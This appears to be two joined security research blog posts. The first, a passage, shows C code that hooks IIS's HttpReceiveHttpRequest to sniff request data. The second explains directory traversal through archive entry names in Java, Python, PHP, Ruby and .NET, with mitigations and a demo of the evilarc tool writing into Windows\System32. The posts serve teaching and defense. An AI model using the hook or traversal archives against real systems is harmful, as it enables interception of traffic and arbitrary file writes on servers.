ULONG HttpReceiveHttpRequestHook(HANDLE ReqQueueHandle, ULONGLONG RequestId, ULONG Flags, PHTTP_REQUEST pRequestBuffer, ULONG RequestBufferLength, PULONG pBytesReceived, LPOVERLAPPED pOverlapped) {

ULONG ret;



/* First we replace the first 6 bytes of the real ‘HttpReceiveHttpRequest’ function with their original value */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &oldHRHR, 6, &i);

/* We then call the real function and save the return value */

ret = HttpReceiveHttpRequestSaved(ReqQueueHandle, RequestId, Flags, pRequestBuffer, RequestBufferLength, pBytesReceived, pOverlapped);

/* At this point all data with the HTTP_REQUEST stored at pRequestBuffer is valid and can be saved to a file or sent out over the network. This data includes the request headers and Get parameters passed with the request */

/* After we have performed our sniffing operations we write our trampoline back into the real function */

WriteProcessMemory(GetCurrentProcess(), HttpReceiveHttpRequestSaved, &HRHR, 6, &i);

/* And return the saved return value */

return ret;


If similar hooks were implemented for each of the functions listed above all information in and out of IIS could be sniffed in a way which is generic to the web application being used.

Although this implementation is deliberately incomplete it demonstrates one use case for an unprivileged sniffer. This type of attack is possible in Windows due to  specifics of process creation and how privileges are dropped. It is worth mentioning that a similar attack is generally not possible in similar Linux services. In Linux the ability to ptrace a process is controlled by the dumpable flag within the mm member of the process’ task_struct. When privileges are dropped the dumpable flag is unset and this is inherited when a fork or execve occurs. This prevents the owning user of the resulting process from modifying the process’ execution. Because lower privilege workers are not newly created processes in Linux but rather inherit their task_struct from the root owned parent, they are not debuggable by the lower privileged worker account.

We are not currently aware of a way of preventing this type of attack. The Windows privilege structure, and individual privileges such as the seDebugPrivilege are not designed to prevent access to the owning user. If a fix is possible it would likely relate to the creation of the worker processes and would require modification of the individual applications. If you have an idea for a fix please let us know.

Directory Traversal in Archives

By: Greg Ose and Patrick Toomey

I’m sure on the top of everyone’s list of resolutions from the New Year is the ever forgotten “I will write more secure code” and it seems that each year this task gets harder. With more complex and abstracted frameworks and APIs, the ways security related bugs are being introduced to a code base has become equally complex and abstracted. Being a few months into 2009, hopefully we can help you catch up on your resolutions by presenting something else to look for when reviewing or writing secure code.

In recent engagements, we have run into a slew of issues focusing around the well-known vulnerability of directory path traversal. As a refresher, this typically involves injecting file path meta-characters into a filename string to reference arbitrary files and usually results in the modification or disclosure of files on the system. For example, a user supplies the filename /../../etc/passwd which is appended to the path /tmp/uploaded_pictures and ends up referencing the password file instead of a file under the intended directory.

We all know, or at least should know, what a typical directory traversal vulnerability and exploit looks like, however, we have recently seen these issues manifest themselves in the handling of user-provided archive files instead of file path strings. Typically, these user provided files are sent via HTTP uploads. Almost all of the common high-level application APIs provide a means, or a third-party library, to handle archive files. Additionally, almost all of these libraries do not check for potential directory path traversal when they perform the extraction of these files. This puts the liability on the developer to check for malicious archives. While file operation calls with a user controlled variable may be obvious, filenames within user-controlled archives may be the vulnerability that slips by. Developers should not only validate user supplied file paths for directory traversal, but also check file paths included in archive files. As a note, this type of vulnerability has been mentioned before and is not groundbreaking by any means, but we want to take a detailed look into what to be aware of as a developer and how to test for this during vulnerability assessments.

To get started lets take a look at an example provided by Sun themselves (!!!) in a technical article for the package. Code Sample 1 from the article provides their base example for extracting an archive and is shown below.


public class UnZip {
  final int BUFFER = 2048;
  public static void main (String argv[]) {
    try {
      BufferedOutputStream dest = null;
      FileInputStream fis = new FileInputStream(argv[0]);
      ZipInputStream zis = new ZipInputStream(
                               new BufferedInputStream(fis));
      ZipEntry entry;
      while((entry = zis.getNextEntry()) != null) {
        System.out.println("Extracting: " +entry);
        int count;
        byte data[] = new byte[BUFFER];
        // write the files to the disk
        FileOutputStream fos = new FileOutputStream(
        dest = new BufferedOutputStream(fos, BUFFER);
        while ((count =, 0, BUFFER)) != -1) {
          dest.write(data, 0, count);
    } catch(Exception e) {

We can see where the vulnerability manifests itself in processing each entry of the provided ZIP file:

FileOutputStream fos = new FileOutputStream(entry.getName());

entry is the current ZIP entry being processed and getName() returns the filename stored in that entry. After retrieving this filename, the uncompressed data is written to its value. We can see that by using directory traversal in the filename a malicious user may be able to make arbitrary writes anywhere on the filesystem. Unfortunately, on most platforms, if an attacker can arbitrarily write files they can most likely also get arbitrary code executed on the affected server.

Similar issues exist with a number of ZIP library implementations across various languages. As one might expect, the equivalent Python code is far less verbose. While Python doesn’t provide any sample code, a simple, and vulnerable, ZIP extraction would look as follows:

from zipfile import ZipFile
import sys
zf = ZipFile(sys.argv[1])

The extractall method does what one would expect it to do, except that it does not check for directory traversal in the ZIP entries’ file paths. Python also provides equivalent objects for handling tar archives. Interestingly, the tar archive library documentation does make mention of the risk associated with path traversal within archive files. The documentation for the extractall method states:

Warning: Never extract archives from untrusted sources without prior inspection. It is possible that files are created outside of path, e.g. members that have absolute filenames starting with “/” or filenames with two dots “..”.

How about PHP, surely they provide a function to work with ZIP files (what don’t they have a function for). The PHP manual provides the following example code for extracting ZIP files.

$zip = new ZipArchive;
$res = $zip->open('');
if ($res === TRUE) {
  echo 'ok';
} else {
  echo 'failed, code:' . $res;

Sure enough, this code is also vulnerable to file path manipulation within the archive.

What about everyone’s favorite language du jour, Ruby? Ruby itself does not have ZIP file extraction built in to the language’s core library. However, rubyzip is a popular third-party library and like the prior libraries, is also vulnerable to directory traversal. The example below was stated in a post by the library’s author as how to extract a ZIP file and all of its directories:

require 'rubygems'
require 'zip/zipfilesystem'
require 'fileutils'


Zip::ZipFile::open("") {

  zf.each { |e|
    fpath = File.join(OUTDIR,
    zf.extract(e, fpath)

Finally, similar to Ruby, the .Net environment does not have ZIP archive handling built in to the core library. A quick googling for “.Net zip files” leads to an article on MSDN. In this article, the authors detail this gap in the .Net library and then go on to present a solution. The tools released include a signed DLL for use during development and a set of command-line utility programs that utilize the library. One of these command-line utilities is Unzip.exe. Sure enough, Unzip.exe is vulnerable to path traversal within an archive. No warning is presented and the archive is extracted without concern to the fully resolved path of the files within the archive.

How do mainstream, standalone, compression utility programs handle this vulnerability? We tested a large number of archive extraction programs (Winzip, Winrar, command line Info-Zip, unzip on Unix, etc) and noted that all of them either provide a warning when a ZIP file entry contains directory traversal, escape the meta-characters, or just ignore the traversed directory path all together.

When writing code that interacts with archives, the same precautions used by mainstream extraction utilities must be performed by the developer. As with any user-controlled input, the directory filenames should be validated before being processed by any file operation. The developer should verify that path traversal characters do not occur in any entries within the archive. Similarly, the developer may also leverage utility functions within their language to first determine the fully resolved path before extracting an entry (ex. os.path.normpath(path) in Python).

A more drastic mitigation, though perhaps the better long-term solution, would involve modifying these default libraries to work similarly to their standalone application counterparts by default. It is extremely rare to require path traversal characters in a legitimate archive. Perhaps, the libraries should be modified to secure the common case, requiring a developer to explicitly request the atypical case. For example, what if the Python ZipFile object changed its default behavior to throw an exception in the presence of file traversal characters? The extractall method signature could be modified as follows:


By default the allow_traverse is set to False, throwing zipfile.BadZipfile if path traversal characters are encountered. This would provide a secure by default configuration for the library while still allowing the existing behavior if necessary. This requires the developer to explicitly request support for path traversal, thus mitigating accidental and insecure usage. This is unlikely to impact existing code, as archives with path traversal characters are not easy to create and it is extremely unlikely a legitimate archive would accidentally include such characters.

During the course of this write-up we grew tired of hand-editing zip archives in a hex-editor to add directory traversal characters. So, we put together a Python script that can be used to generate ZIP archives with path traversal sequences automatically inserted. It can create directories in both Unix and Windows environments for ZIP files (including jar) and tar files with and without compression (gzip or bzip2). You can specify an arbitrary number of directories to traverse and an additional path to append (think var/www or Windows\System32). The full usage follows:

$ ./ --help
Usage: evilarc <input file>

Create archive containing a file with directory traversal

  --version      show program's version number and exit
  -h, --help     show this help message and exit
  -f OUT, --output-file=OUT
                 File to output archive to.  Archive type is
                 based off of file extension.  Supported
                 extensions are zip, jar, tar, tar.bz2, tar.gz,
                 and tgz.  Defaults to
  -d DEPTH, --depth=DEPTH
                 Number directories to traverse. Defaults to 8.
                 OS platform for archive (win|unix). Defaults
                 to win.
  -p PATH, --path=PATH  Path to include in filename after
                 traversal.  Ex:WINDOWS\System32\

The following example shows the file test.txt being added to an archive and extracted to the C:\Windows\System32 directory through the vulnerable Java class we previously discussed:

$ ./ test.txt -p Windows\\System32\\
Creating containing ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ java javaunzip
Extracting: ..\..\..\..\..\..\..\..\Windows\System32\test.txt

$ ls -al /cygdrive/c/Windows/System32/test.txt
-rwxr-x---+ 1 gose mkgroup-l-d 21 Feb 24 11:52 /cygdrive/c/Windows/System32/test.txt

We have made the script available for download here: